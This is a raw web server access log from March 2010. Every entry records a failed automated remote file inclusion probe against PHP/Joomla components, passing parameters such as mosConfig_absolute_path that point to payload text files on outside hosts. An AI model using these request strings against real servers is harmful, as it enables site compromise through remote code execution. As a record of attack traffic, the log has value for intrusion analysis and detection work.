61.63.82.14 - - [04/Mar/2010:04:32:43 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
61.63.82.14 - - [04/Mar/2010:04:32:43 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
61.63.82.14 - - [04/Mar/2010:04:33:09 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
61.63.82.14 - - [04/Mar/2010:04:33:09 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
121.254.172.27 - - [04/Mar/2010:04:33:18 -0800] "GET /logs/access_100222.log%20%20//administrator/components//com_cpg/cpg.php?mosConfig_absolute_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [04/Mar/2010:04:33:23 -0800] "GET /components//com_cpg/cpg.php?mosConfig_absolute_path=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [04/Mar/2010:04:33:23 -0800] "GET /logs//components//com_cpg/cpg.php?mosConfig_absolute_path=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [04/Mar/2010:04:33:23 -0800] "GET /logs/access_100210.log/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
78.110.50.114 - - [04/Mar/2010:04:33:27 -0800] "GET /logs/access_100226.log//components//com_cpg/cpg.php?mosConfig_absolute_path=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [04/Mar/2010:04:33:31 -0800] "GET /logs/access_100222.log//components//com_cpg/cpg.php?mosConfig_absolute_path=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:04:34:09 -0800] "GET /logs/access_100212.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.formationalliance.com/images/id1.txt???????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [04/Mar/2010:04:34:11 -0800] "GET /logs/access_100219.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
82.208.46.145 - - [04/Mar/2010:04:34:40 -0800] "GET /logs/access_100129.log//modules/agendax/addevent.inc.php?agendax_path=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.126.254.112 - - [04/Mar/2010:04:34:40 -0800] "GET /logs/access_100222.log%20%20/?board_skin_path=http://www.noin9191.com/ams/ammember/auto1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [04/Mar/2010:04:34:44 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:04:34:48 -0800] "GET /logs/access_100212.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.formationalliance.com/images/id1.txt???????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [04/Mar/2010:04:35:28 -0800] "GET /logs/access_100213.log/errors.php?error=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [04/Mar/2010:04:35:28 -0800] "GET /logs/errors.php?error=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [04/Mar/2010:04:35:29 -0800] "GET /errors.php?error=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [04/Mar/2010:04:36:01 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
95.110.224.127 - - [04/Mar/2010:04:36:43 -0800] "GET /logs////errors.php?error=http://www.lpm.mgroup.pl/modules/xoopsgallery/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
209.126.254.112 - - [04/Mar/2010:04:36:48 -0800] "GET /logs/access_100202.log%20%20/?board_skin_path=http://www.noin9191.com/ams/ammember/auto1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.126.254.112 - - [04/Mar/2010:04:36:48 -0800] "GET /logs/access_100221.log%20%20/?board_skin_path=http://www.noin9191.com/ams/ammember/auto1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [04/Mar/2010:04:36:50 -0800] "GET /logs/access_100223.log/http://keycarsales.com/css/templates/target.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
60.251.165.181 - - [04/Mar/2010:04:36:51 -0800] "GET /http://keycarsales.com/css/templates/target.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
60.251.165.181 - - [04/Mar/2010:04:36:52 -0800] "GET /logs/http://keycarsales.com/css/templates/target.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
61.63.82.14 - - [04/Mar/2010:04:37:04 -0800] "GET /logs/access_100213.log/errors.php?error=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [04/Mar/2010:04:37:04 -0800] "GET /logs/errors.php?error=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [04/Mar/2010:04:37:05 -0800] "GET /errors.php?error=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:04:37:09 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:04:37:09 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:04:37:09 -0800] "GET /logs/access_100206.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [04/Mar/2010:04:37:35 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
209.126.254.112 - - [04/Mar/2010:04:38:18 -0800] "GET /logs/access_100203.log%20%20/?board_skin_path=http://www.noin9191.com/ams/ammember/auto1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [04/Mar/2010:04:38:44 -0800] "GET /logs/access_100130.log//inc/header.php/step_one.php?server_inc=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [04/Mar/2010:04:39:06 -0800] "GET /logs/access_100213.log/errors.php?error=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [04/Mar/2010:04:39:06 -0800] "GET /errors.php?error=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [04/Mar/2010:04:39:07 -0800] "GET /logs/errors.php?error=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.52.184.212 - - [04/Mar/2010:04:39:13 -0800] "GET //errors.php?error=http://www.lpm.mgroup.pl/modules/xoopsgallery/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.833" "www.puaga.com"
209.126.254.112 - - [04/Mar/2010:04:39:31 -0800] "GET /logs/access_100210.log%20%20/?board_skin_path=http://www.noin9191.com/ams/ammember/auto1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [04/Mar/2010:04:39:45 -0800] "GET /logs/access_100213.log/errors.php?error=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [04/Mar/2010:04:39:45 -0800] "GET /errors.php?error=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [04/Mar/2010:04:39:45 -0800] "GET /logs/errors.php?error=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.126.254.112 - - [04/Mar/2010:04:40:14 -0800] "GET /logs/access_100217.log%20%20/?board_skin_path=http://www.noin9191.com/ams/ammember/auto1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [04/Mar/2010:04:40:57 -0800] "GET /logs//administrator/components//com_cpg/cpg.php?mosConfig_absolute_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [04/Mar/2010:04:40:57 -0800] "GET /administrator/components//com_cpg/cpg.php?mosConfig_absolute_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [04/Mar/2010:04:41:02 -0800] "GET /logs/access_100226.log%20%20//administrator/components//com_cpg/cpg.php?mosConfig_absolute_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [04/Mar/2010:04:41:02 -0800] "GET /logs//components//com_cpg/cpg.php?mosConfig_absolute_path=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [04/Mar/2010:04:41:02 -0800] "GET /components//com_cpg/cpg.php?mosConfig_absolute_path=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [04/Mar/2010:04:41:09 -0800] "GET /logs/access_100226.log%20%20//components//com_cpg/cpg.php?mosConfig_absolute_path=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [04/Mar/2010:04:41:13 -0800] "GET /logs//administrator/components//com_cpg/cpg.php?mosConfig_absolute_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [04/Mar/2010:04:41:13 -0800] "GET /administrator/components//com_cpg/cpg.php?mosConfig_absolute_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [04/Mar/2010:04:41:19 -0800] "GET /logs/access_100226.log%20%20//administrator/components//com_cpg/cpg.php?mosConfig_absolute_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [04/Mar/2010:04:41:48 -0800] "GET /variable.class.php=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [04/Mar/2010:04:41:48 -0800] "GET /logs/variable.class.php=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [04/Mar/2010:04:42:07 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
219.94.194.248 - - [04/Mar/2010:04:42:09 -0800] "GET /logs/access_100222.log%20%20//administrator/components//com_cpg/cpg.php?mosConfig_absolute_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [04/Mar/2010:04:42:18 -0800] "GET /logs/access_100222.log%20%20//components//com_cpg/cpg.php?mosConfig_absolute_path=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [04/Mar/2010:04:42:20 -0800] "GET /logs/access_100222.log%20%20//administrator/components//com_cpg/cpg.php?mosConfig_absolute_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [04/Mar/2010:04:42:28 -0800] "GET /logs//components//com_cpg/cpg.php?mosConfig_absolute_path=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [04/Mar/2010:04:42:28 -0800] "GET /logs/access_100226.log//components//com_cpg/cpg.php?mosConfig_absolute_path=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [04/Mar/2010:04:42:28 -0800] "GET /components//com_cpg/cpg.php?mosConfig_absolute_path=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:04:43:11 -0800] "GET /logs/access_100221.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [04/Mar/2010:04:43:30 -0800] "GET /logs/access_100222.log//components//com_cpg/cpg.php?mosConfig_absolute_path=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [04/Mar/2010:04:43:38 -0800] "GET /logs/access_100207.log/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
61.63.82.14 - - [04/Mar/2010:04:43:39 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
61.63.82.14 - - [04/Mar/2010:04:43:40 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
61.63.82.14 - - [04/Mar/2010:04:44:20 -0800] "GET /logs/access_100217.log/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
60.251.165.181 - - [04/Mar/2010:04:45:33 -0800] "GET /logs/access_100212.log/http://keycarsales.com/css/templates/target.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
75.126.35.98 - - [04/Mar/2010:04:45:35 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.126.35.98 - - [04/Mar/2010:04:45:37 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.126.35.98 - - [04/Mar/2010:04:45:37 -0800] "GET /logs/access_100128.log%20%20//bbs/write_update.php?board_skin_path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [04/Mar/2010:04:45:38 -0800] "GET /components//com_cpg/cpg.php?mosConfig_absolute_path=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [04/Mar/2010:04:45:38 -0800] "GET /logs//components//com_cpg/cpg.php?mosConfig_absolute_path=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [04/Mar/2010:04:45:38 -0800] "GET /logs/access_100226.log//components//com_cpg/cpg.php?mosConfig_absolute_path=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [04/Mar/2010:04:46:19 -0800] "GET /logs/access_100222.log//components//com_cpg/cpg.php?mosConfig_absolute_path=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [04/Mar/2010:04:47:07 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [04/Mar/2010:04:47:07 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [04/Mar/2010:04:47:07 -0800] "GET /logs/access_100214.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [04/Mar/2010:04:47:26 -0800] "GET /logs/access_100130.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [04/Mar/2010:04:48:41 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
174.37.58.222 - - [04/Mar/2010:04:48:44 -0800] "GET /write_comment_update.php?board_skin_path=http://www.rockmanpm.com/i/x/zzz/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.58.222 - - [04/Mar/2010:04:48:44 -0800] "GET /logs/write_comment_update.php?board_skin_path=http://www.rockmanpm.com/i/x/zzz/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.58.222 - - [04/Mar/2010:04:48:44 -0800] "GET /logs/access_100210.log%20%20/write_comment_update.php?board_skin_path=http://www.rockmanpm.com/i/x/zzz/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.58.222 - - [04/Mar/2010:04:48:55 -0800] "GET /logs/access_100202.log%20%20/write_comment_update.php?board_skin_path=http://www.rockmanpm.com/i/x/zzz/id1?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [04/Mar/2010:04:49:43 -0800] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [04/Mar/2010:04:49:43 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [04/Mar/2010:04:49:43 -0800] "GET /logs/access_100211.log%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.52.184.212 - - [04/Mar/2010:04:51:42 -0800] "GET //errors.php?error=http://www.lpm.mgroup.pl/modules/xoopsgallery/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.833" "www.puaga.com"
122.168.195.145 - - [04/Mar/2010:04:52:40 -0800] "GET /logs/access_100226.log//errors.php?error=http://www.new-vision.com.pl/cmdu.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
122.168.195.145 - - [04/Mar/2010:04:52:41 -0800] "GET /errors.php?error=http://www.new-vision.com.pl/cmdu.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
122.168.195.145 - - [04/Mar/2010:04:52:44 -0800] "GET /logs//errors.php?error=http://www.new-vision.com.pl/cmdu.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
82.208.46.79 - - [04/Mar/2010:04:52:44 -0800] "GET /logs/access_100128.log/errors.php?error=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.208.46.79 - - [04/Mar/2010:04:52:44 -0800] "GET /errors.php?error=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.208.46.79 - - [04/Mar/2010:04:52:44 -0800] "GET /logs/errors.php?error=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [04/Mar/2010:04:53:09 -0800] "GET /koesubmit.php?mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [04/Mar/2010:04:53:09 -0800] "GET /logs/koesubmit.php?mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [04/Mar/2010:04:53:09 -0800] "GET /logs/access_100220.log%20%20/koesubmit.php?mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.168.195.145 - - [04/Mar/2010:04:53:22 -0800] "GET /logs/access_100210.log//errors.php?error=http://www.new-vision.com.pl/cmdu.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
218.38.243.44 - - [04/Mar/2010:04:53:31 -0800] "GET /logs/access_100126.log%20%20/koesubmit.php?mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.208.46.79 - - [04/Mar/2010:04:54:08 -0800] "GET /logs/access_100201.log/errors.php?error=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [04/Mar/2010:04:55:57 -0800] "GET /logs/access_100217.log/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
61.63.82.14 - - [04/Mar/2010:04:55:58 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
61.63.82.14 - - [04/Mar/2010:04:55:59 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
173.212.202.130 - - [04/Mar/2010:04:56:35 -0800] "GET /logs/access_100210.log%20%20//components/com_flyspray/startdown.php?file=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [04/Mar/2010:04:56:35 -0800] "GET /components/com_flyspray/startdown.php?file=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [04/Mar/2010:04:56:35 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [04/Mar/2010:04:56:59 -0800] "GET /logs/access_100211.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [04/Mar/2010:04:57:11 -0800] "GET /components/com_flyspray/startdown.php?file=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [04/Mar/2010:04:57:11 -0800] "GET /logs/access_100210.log//components/com_flyspray/startdown.php?file=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [04/Mar/2010:04:57:11 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [04/Mar/2010:04:58:09 -0800] "GET /logs/access_100203.log/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
173.212.202.130 - - [04/Mar/2010:04:58:10 -0800] "GET /logs/access_100204.log//components/com_flyspray/startdown.php?file=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [04/Mar/2010:04:58:25 -0800] "GET /logs/access_100204.log%20%20//components/com_flyspray/startdown.php?file=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
